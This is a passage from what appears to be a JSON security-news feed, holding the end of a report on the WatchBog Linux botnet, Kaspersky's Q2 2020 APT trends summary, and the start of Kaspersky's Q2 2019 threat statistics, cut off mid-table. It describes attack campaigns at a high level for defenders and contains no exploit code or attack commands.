instances\n \n**Spreading Module** \n \n\n\n * Apache ActiveMQ (CVE-2016-3088)\n * Solr (CVE-2019-0192)\n * Code Execution over Redis\n \nAfter scanning and brute-forcing modules discover a Linux machine running the vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from Pastebin website. \n \nThe malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable. \n \nResearchers have recommended Linux and Windows administrators to keep their software and operating systems up-to-date against known vulnerabilities in order to prevent themselves from being a victim of such attack campaigns. \n \nYou can find if WatchBog has infected your Linux machine by checking the existence of the \"/tmp/.tmplassstgggzzzqpppppp12233333\" file or the \"/tmp/.gooobb\" file on your system.\n", "modified": "2019-07-25T11:08:32", "published": "2019-07-25T09:38:00", "id": "THN:66694DD5D9C12B2B7881AB6C960E34DC", "href": "https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html", "type": "thn", "title": "Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2008-3431", "CVE-2019-10149", "CVE-2020-0688"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact &#x27;[intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)&#x27;.\n\n## **The most remarkable findings**\n\nOn May 11, the UK-based supercomputing center, ARCHER, announced that it would shut down access to its network while it investigated a security incident. The website stated that the &quot;ARCHER facility is based around a Cray XC30 supercomputer (with 4920 nodes) that provides the central computational resource&quot;. At the same time, the German-based bwHPC also announced a security incident and decided to restrict access to its resources. The Swiss National Supercomputing Centre, at the time involved in a project to study the small membrane protein of the coronavirus, confirmed that it, and other European high-performance computer facilities, had been attacked and that it had temporarily closed. On May 15, the EGI Computer Security and Incident Response Team (EGI-CSIRT) published an alert covering two incidents that, according to its report, may or may not be related. Both incidents describe the targeting of academic data centers for &quot;CPU mining purposes&quot;. The alert includes a number of IoCs, which complement other OSINT (open-source intelligence) observations. Although we weren&#x27;t able to establish with a high degree of certitude that the ARCHER hack and the incidents described by EGI-CSIRT are related, we suspect they might be. Some media speculated that all these attacks might be related to COVID-19 research being carried out at the supercomputing centers.\n\nInterestingly, last July 16th 2020, NCSC [published](<https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf>) an advisory describing malicious activity targeting institutions related to research to find a vaccine for COVID-19. In this case, the malware used in the attacks belongs to a family called WellMess, as [originally described](<https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf>) by LAC Co back in 2018. Until recently, this malware was not believed to be related to any APT activity. Surprisingly, NCSC attributes this activity to the APT-29 threat actor. However, it does not provide any public proof.\n\nFrom our own research, we can confirm that WellMess&#x27;s activity seems to follow a cycle, being used in campaigns every three months or so since its discovery. We observed a peak of activity in fall of 2019, followed by an increase in the number of C2s in February 2020. We also observed high-profile targeting, including telcos, government and contractors in MENA and the EU. However, from our side we cannot confirm attribution or targeting of health institutions at the moment.\n\nFor more details about WellMess, you can check our presentation from GReAT ideas here: <https://youtu.be/xeTYLRCwnFo>\n\n## **Russian-speaking activity**\n\nIn May, researchers at Leonardo published a report about &quot;Penquin_x64&quot;, a previously undocumented variant of Turla&#x27;s Penquin GNU/Linux backdoor. Kaspersky has publicly documented the Penquin family, tracing it back to its Unix ancestors in the Moonlight Maze operation of the 1990s. We followed up on this latest research by generating network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover that tens of internet hoster&#x27;s servers in Europe and the US are still compromised today. We think it&#x27;s possible that, following public disclosure of Turla&#x27;s GNU/Linux tools, the Turla threat actor may have been repurposing Penquin to conduct operations other than traditional intelligence.\n\nIn June, we discovered two different domain names, &quot;emro-who[.]in&quot; and &quot;emro-who[.]org&quot;, typo-squatting the World Health Organization (WHO) Regional Office for the Eastern Mediterranean (EMRO). These domains, registered on June 21 using the Njalla.no registrar, seem to be used as sender domains for a spear-phishing campaign. This type of typo-squatting is reminiscent of Sofacy campaigns against other international organizations. Moreover, we have seen Njalla.no recently used to register SPLM and XTUNNEL C2 (command-and-control) servers and we have seen this autonomous system used by Sofacy in the past for a SPLM C2.\n\nHades is an elusive, highly dynamic threat actor that commonly engages in tailored hacking and special access operations, such as the [OlympicDestroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>) attack or the [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) (aka NotPetya) and Badrabbit attacks. On May 28, the US National Security Agency (NSA) [published an alert](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) detailing the use by Hades of an Exim vulnerability (CVE-2019-10149) for what appears to be a potentially large hacking operation designed for mass access. Our own report expanded on the scripts used in this operation, as well as providing other IoCs that we discovered.\n\n## **Chinese-speaking activity**\n\nIn late 2019, and again in March this year, we described ongoing malicious activities from a previously unknown threat actor that we named [Holy Water](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>). Holy Water notably leveraged a Go language and Google Drive-command-driven implant that we dubbed Godlike12. Following the publication of our report, and notifications to relevant incident response organizations, new Holy Water samples were submitted to VirusTotal. The newly discovered samples include Telegram-controlled and open-source-based Python implants that were probably deployed on the victim&#x27;s networks after a successful intrusion.\n\nIn March, one of our YARA rules from previous research on ShadowPad attacks detected a recently compiled executable file uploaded to VirusTotal. Later we found a few other samples from our own telemetry. ShadowPad is a modular attack platform consisting of a root module and various plugin modules responsible for diverse functionalities. ShadowPad was first discovered by Kaspersky in 2017. In August of that year, one of our customers detected suspicious network activities. After thorough investigation, we found a legitimate software module that had been compromised and backdoored by an advanced threat actor in a sophisticated software supply-chain attack. We notified the software vendor and also [published the outcome of our investigations in a technical white paper](<https://securelist.com/shadowpad-in-corporate-networks/81432/>). Since then, ShadowPad malware has been deployed in a number of major cyberattacks, with a different subset of plugins used in different attack cases: the CCleaner incident in 2017 and the [ShadowHammer ](<https://securelist.com/operation-shadowhammer/89992/>)attacks in 2018 are the major examples of such attacks.\n\nWhen analyzing new samples from ShadowPad malware, compiled and used in attacks since late 2019, our investigation revealed a strong connection between these recent ShadowPad malware samples and the CactusPete threat actor. CactusPete started deploying ShadowPad malware to a few victims at the beginning of 2019 through its HighProof backdoor. However, since late 2019, ShadowPad has been commonly used in CactusPete attacks.\n\nThis quarter, we described another CactusPete attack campaign which started in December 2019 In this campaign, the CactusPete threat actor used a new method to drop an updated version of the DoubleT backdoor onto the computers. The attackers implanted a new dropper module in the Microsoft Word Startup directory, most likely through a malicious document. This malicious dropper is responsible for dropping and executing a new version of the DoubleT backdoor, which utilizes a new method of encrypting the C2 server address.\n\nWhile analysing compromised machines in Central Asia, we revealed an additional infection that was unrelated to the initial subject of our investigation. This led us to detect previously unknown malware that we dubbed B&amp;W, which provides an attacker with the capabilities to remotely control a victim&#x27;s machine. Further analysis of the samples, infrastructure and other related artefacts allowed us to conclude, with medium confidence, that the newly found malware is related to the SixLittleMonkeys APT. This group is known to have been active for several years, targeting government entities in Central Asia.\n\nHoneyMyte is an APT threat actor that we have been tracking for several years. In February, our fellow researchers at Avira blogged about HoneyMyte PlugX variants that they had recently observed targeting Hong Kong. PlugX has been used by multiple APT groups over the past decade, especially shared among Chinese-speaking threat actors, and has changed in many ways. Avira\u00b4s post covers the PlugX loader and backdoor payload, including its USB capabilities. In May, we published an update on this threat actor, specifically providing timely indicators to aid in threat hunting for some of the PlugX variants found in the wild between January and May this year.\n\nIn May, we discovered a watering hole on the website of a Southeast Asian top official. This watering hole, set up in March, seemed to leverage whitelisting and social engineering techniques to infect its targets. The final payload was a simple ZIP archive containing a readme file prompting the victim to execute a CobaltStrike implant. The mechanism used to execute CobaltStrike was DLL side-loading, which decrypted and executed a CobaltStrike stager shellcode. Analysis of the code, the infrastructure and the victimology led us to attribute this watering-hole, with high confidence, to the HoneyMyte APT threat actor.\n\nQuarian is a little-known malicious program that Chinese-speaking actors have used since around 2012. We hadn&#x27;t spotted any further activity until we observed a resurgence in an attack by the Icefog group in 2019. We tracked the activity of the malware following this and noticed a new variant that was used during several attacks on Middle Eastern and African governments during 2020. In one case, we could see that this variant was deployed following exploitation of the CVE-2020-0688 vulnerability on the network of a government entity. This vulnerability, which was publicly reported in February 2020, allows an authenticated user to run commands as SYSTEM on a Microsoft Exchange server. In this case, the server was indeed compromised and was hosting the ChinaChopper webshell, which was used to obtain, and later launch, the Quarian and PlugX backdoors. Our analysis led us to assume, with medium to high confidence, that the group behind these attacks is one we track under the name CloudComputating - a Chinese-speaking actor that, based on previous reports, has targeted high-profile Middle Eastern diplomatic targets.\n\nIn March, researchers at Check Point Research published a [report](<https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/>) describing an APT campaign that targeted Mongolia&#x27;s public sector and leveraged a coronavirus-themed lure to conduct its initial intrusion. We were able to discover further samples and another COVID-themed document with the same targeting, as well as additional targets in Russia. We attribute this activity with medium confidence to IronHusky.\n\n## **Middle East**\n\nThe MuddyWater APT was discovered in 2017 and has been active in the Middle East ever since. In 2019, we reported activity against telecoms providers in Iraq and Iran, as well as government bodies in Lebanon. We recently discovered MuddyWater using a new C++ toolchain in a new wave of attacks in which the actor leveraged an open-source utility called Secure Socket Funneling for lateral movement.\n\nAt the end of May, we observed that Oilrig had included the DNSExfitrator tool in its toolset. It allows the threat actor to use the DNS over HTTPS (DoH) protocol. Use of the DNS protocol for malware communications is a technique that Oilrig has been using for a long time. The difference between DNS- and DoH-based requests is that, instead of plain text requests to port 53, they would use port 443 in encrypted packets. Oilrig added the publicly available DNSExfiltrator tool to its arsenal, which allows DoH queries to Google and Cloudflare services. This time, the operators decided to use subdomains of a COVID-related domain which are hardcoded in the DNSExfitrator detected samples.\n\n## **South\u0435ast Asia and Korean Peninsula**\n\nBlueNoroff is one of the most prolific financially motivated APT actors and we have published several reports of BlueNoroff campaigns targeting financial institutions. Recently, we uncovered another campaign that has been active since at least 2017. In this campaign, the group sends spear-phishing emails containing an archived Windows shortcut file. The file names are disguised as security or cryptocurrency related files in order to entice users into executing them. The infection chain started from this shortcut file is a complex multi-stage infection procedure. Before delivering the Windows executable payload, the actor uses two VBS and three PowerShell scripts in order to collect system information. The actor very carefully delivers the final payload only to the intended targets. The backdoor payload also utilizes a multi-stage infection procedure. The actor uses it to control infected hosts and implants additional malware for surveillance. These malicious programs are responsible for stealing the user&#x27;s keystrokes and saving a screenshot of the infected machine. The main targets of this campaign are financial institutions, such as cryptocurrency businesses, and fintech companies. We identified diverse victims from 10 countries, as well as more potential victims from open source intelligence.\n\nThe Lazarus group has been a major threat actor for several years. Alongside goals like cyber-espionage and cyber-sabotage, this threat actor has targeted banks and other financial companies around the globe. The group continues to be very active. We recently observed the Lazarus group attacking a software vendor in South Korea using Bookcode, malware that we evaluate to be a Manuscrypt variant, utilizing a watering-hole attack to deliver it. Manuscrypt is one of the Lazarus group&#x27;s tools that is actively being updated and used. The group attacked the same victim twice. Almost a year prior to compromising this victim, Lazarus attempted to infect it by masquerading as a well-known security tool, but failed. We were able to construct the group&#x27;s post-exploitation activity, identifying various freeware and red-teaming tools used. Although Lazarus has recently tended to focus more on targeting the financial industry, we believe that in this campaign they were seeking to exfiltrate intellectual property. We also observed that they previously spread Bookcode using a decoy document related to a company working in the defense sector. Based on our observations, we evaluate that the Bookcode malware is being used exclusively for cyber-espionage campaigns.\n\nIn April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, Kaspersky was able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is also the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks for financial gain.\n\nLast year we created a private report on a malware framework that we named MATA, which we attribute, with low confidence, to the Lazarus group. This framework included several components, such as a loader, orchestrator and plug-ins. Initially, this framework targeted Windows and Linux. However, in April we discovered a suspicious macOS file uploaded to VirusTotal using a rule to detect the MATA malware framework. After looking into this malware, we confirmed that it was a macOS variant of the MATA malware. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. While investigating, to find more solid evidence for attribution, we found an old Manuscrypt strain that used a similar configuration structure. We also discovered a cluster of C2 servers probably related to this campaign.\n\nThe MATA framework was not the only way that Lazarus targeted macOS. We also observed a cluster of activity linked to [Operation ](<https://securelist.com/operation-applejeus-sequel/95596/>)[AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>). The other was similar to the macOS malware used in a campaign that we call TangDaiwbo. This is a multi-platform cryptocurrency exchange campaign: Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim&#x27;s system.\n\nEarly this year, we reported improvements in a Lazarus campaign targeting a cryptocurrency business. In this campaign, Lazarus adopted a downloader that sends compromised host information and selectively fetches the next-stage payload. Recently, we identified a Lazarus campaign with similar strategies, but targeting academic and automotive sectors. Lazarus also adopted new methods to deliver its tools. First of all, the group elaborated its weaponized document by adopting remote template injection techniques. Previously, Lazarus delivered macro-embedded documents to the victim, but the group has now applied one more stage to hinder detection. The group also utilized an open-source PDF reader named Sumatra PDF to make Trojanized applications. They created a Trojanized PDF reader, sending it to the victim with a crafted PDF file. If the victim opens this file, the Trojanised PDF viewer implants malicious files and shows decoy documents to deceive the victim. The actor delivers the final payload very carefully, and executes it in memory. Fortunately, we were able to get the final payload and confirm that it was a Manuscrypt variant that we had already described. We also found that it&#x27;s the same malware variant that the US CISA (Cybersecurity and Infrastructure Security Agency) recently reported, named COPPERHEDGE.\n\nFollowing our report describing the long-standing [PhantomLance](<https://securelist.com/apt-phantomlance/96772/>) campaign in Southeast Asia, we published a private report providing detailed attribution based on discovered overlaps with reported campaigns of the OceanLotus APT. In particular, we found multiple code similarities with the previous Android campaign, as well as similarities in macOS backdoors, infrastructure overlap with Windows backdoors and a couple of cross-platform resemblances. Based on our research, we believe, with medium confidence, that PhantomLance is a modern Android campaign conducted by OceanLotus. Apart from the attribution details, we described the actor&#x27;s spreading strategy using techniques to bypass app market filters. We also provided additional details about samples associated with previously reported suspected infrastructure, as well as the latest sample deployed in 2020 that uses Firebase to decrypt its payload.\n\nAdditionally, OceanLotus has been using new variants of its multi-stage loader since the second half of 2019. The new variants use target-specific information (username, hostname, etc.) of the targeted host that they obtained beforehand, in order to ensure their final implant is deployed on the right victim. The group continues to deploy its backdoor implant, as well as Cobalt Strike Beacon, configuring them with updated infrastructure.\n\n## **Other interesting discoveries**\n\nThe Deceptikons APT is a long-running espionage group believed to have been providing mercenary services for almost a decade now. The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits. The Deceptikons infrastructure and malware set is clever, rather than technically advanced. It is also highly persistent and in many ways reminds us of WildNeutron. Deceptikon&#x27;s repeated targeting of commercial and non-governmental organizations is somewhat unusual for APT actors. In 2019, Deceptikons spear-phished a set of European law firms, deploying PowerShell scripts. As in previous campaigns, the actor used modified LNK files requiring user interaction to initially compromise systems and execute a PowerShell backdoor. In all likelihood, the group&#x27;s motivations included obtaining specific financial information, details of negotiations, and perhaps even evidence of the law firms&#x27; clientele.\n\nMagicScroll (aka AcidBox) is the name we&#x27;ve given to a sophisticated malware framework, whose main purpose is to decrypt and load an arbitrary payload in kernel mode. The framework consists of several stages. The first stage is a Windows security provider that is loaded by the system on boot and executed in user mode. This decrypts and runs a second payload, which is physically stored in the registry. Although we weren&#x27;t able to find a victim with this second stage, we were able to find a file that matches the expected format of the second stage. This second stage payload utilizes a well-known vulnerability in a VirtualBox driver (CVE-2008-3431) to load the third stage, which is designed to run in kernel mode. The kernel mode payload is decrypted from a resource from the second stage, using the key retrieved from the registry. Unfortunately, we couldn&#x27;t find a decryption key to decrypt the third stage payload, so we don&#x27;t know what the last part of this malware framework looks like. Although the code is quite sophisticated, we couldn&#x27;t identify any similarity with other known frameworks.\n\nAarogya Setu is the name of a mandatory COVID-19 mobile tracking app developed by the National Informatics Centre, an organization that comes under the Ministry of Electronics and Information Technology in India. It allows its users to connect to essential health services in India. With cyber criminals and APT actors taking advantage of pandemic-tracking applications to distribute Trojanized mobile apps, we investigated and identified apps that mimic the appearance and behavior of the legitimate Aarogya Setu app while deploying Android RATs. We consider one of these to be a new version of a RAT that we previously reported being used by the Transparent Tribe threat actor.\n\n## **Final thoughts**\n\nThe threat landscape isn&#x27;t always full of &quot;groundbreaking&quot; events. However, a review of the activities of APT threat actors indicates that there are always interesting developments. Our regular quarterly reviews are intended to highlight these key developments.\n\nHere are the main trends that we&#x27;ve seen in Q2 2020.\n\n * Geo-politics remains an important motive for some APT threat actors, as shown in the activities of MuddyWater, the compromise of the Middle East Eye website and the campaigns of CloudComputating and HoneyMyte groups.\n * As is clear from the activities of Lazarus and BlueNoroff, financial gain is another driver for some threat actors - including the use of ransomware attacks.\n * While Southeast Asia continues to be an active region for APT activities, this quarter we have also observed heavy activity by Chinese-speaking groups, including ShadowPad, HoneyMyte, CactusPete, CloudComputating and SixLittleMonkeys.\n * APT threat actors continue to exploit software vulnerabilities - examples this quarter include Hades and MagicScroll.\n * We have noted before that the use of mobile implants is no longer a novelty, and this quarter is no exception, as illustrated by the PhantomLance campaign.\n * It is clear that APT actors, like opportunistic cybercriminals, continue to exploit the COVID-19 pandemic as a theme to lure potential victims. However, we would note once again that this doesn&#x27;t represent a shift in TTPs.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-07-29T10:00:09", "published": "2020-07-29T10:00:09", "id": "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "href": "https://securelist.com/apt-trends-report-q2-2020/97937/", "type": "securelist", "title": "APT trends report Q2 2020", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T18:27:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0798", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-0863", "CVE-2019-0973", "CVE-2019-10149", "CVE-2019-1069", "CVE-2019-11707", "CVE-2019-11708"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | 